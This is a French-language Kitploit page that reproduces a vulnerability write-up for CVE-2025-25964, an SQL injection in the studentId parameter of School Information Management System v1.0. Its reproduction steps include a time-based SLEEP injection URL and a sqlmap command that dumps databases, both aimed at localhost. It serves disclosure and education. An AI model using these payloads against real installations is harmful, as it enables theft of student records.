Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-25964 — A critical SQL Injection vulnerability (CVE-2025-25964) discovered in the School Information Management System v1.0 | Kitploit
Outils/GitHubGitHub/sudo-sakib/cve-2025-25964
Vulnerability AnalysisWeb Application ExploitationPenetration TestingPapers & ResearchLearning & EducationDatabase Security
GitHubsudo-sakib/cve-2025-25964

CVE-2025-25964

A critical SQL Injection vulnerability (CVE-2025-25964) discovered in the School Information Management System v1.0

Voir le dépôt
22il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-25964: Injection SQL dans School Information Management System v1.0

Introduction

Dans le paysage numérique actuel, l'injection SQL (SQLi) reste l'une des vulnérabilités les plus courantes et dangereuses rencontrées dans les applications web. Cet article de blog traite d'une vulnérabilité critique d'injection SQL (CVE-2025-25964) découverte dans le School Information Management System v1.0, développé par Itsourcecode. Cette vulnérabilité permet aux attaquants distants d'exploiter le système, entraînant une potentielle divulgation d'informations sensibles.

Aperçu de la vulnérabilité

Identifiant CVE : CVE-2025-25964

Type de vulnérabilité : SQL Injection (SQLi)

Produit concerné : Student Information Management System - v1.0

Composant concerné : paramètre studentId dans /columbans/admin/modules/student/index.php

Type d'attaque : Distante

Sévérité : Élevée

Découvreur : Sakib Shaikh

Étapes pour reproduire

Pour démontrer l'impact, suivez ces instructions étape par étape :

  1. Configurer l'application vulnérable : Installez et configurez le School Information Management System v1.0 sur un serveur local.

  2. Se connecter : Connectez-vous avec les identifiants fournis par Itsourecode.

  3. Accéder au point de terminaison vulnérable :

http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207

  1. Injecter une charge utile SQL pour tester l'injection SQL :

http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207+AND+(SELECT+2657+FROM+(SELECT(SLEEP(10)))zKnT)

  1. Observer la réponse de l'application : Si la page met plus de 10 secondes à charger, la vulnérabilité d'injection SQL est confirmée. Cela prouve que la base de données sous-jacente exécute la requête SQL injectée.

  2. Utiliser SQLMap pour l'exploitation automatisée :

root@kitploit:~
python sqlmap.py -u "http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207" \
--cookie="PHPSESSID=your_cookie_here" --risk 3 --level 3 --dbs --technique=T --dump --no-cast

Cette commande tente d'extraire les noms de bases de données, les tables et les informations sensibles du système.

Analyse de la cause racine

Le problème survient en raison d'une désinfection inadéquate des entrées dans le paramètre studentId du fichier index.php. Lorsqu'un attaquant modifie le paramètre studentId avec des charges utiles SQL malveillantes, l'application traite l'entrée sans validation appropriée, conduisant à une injection SQL.

Références

https://itsourcecode.com/free-projects/php-project/st-columban-student-information-management-system/

https://owasp.org/www-community/attacks/SQL_Injection

Télécharger l’outil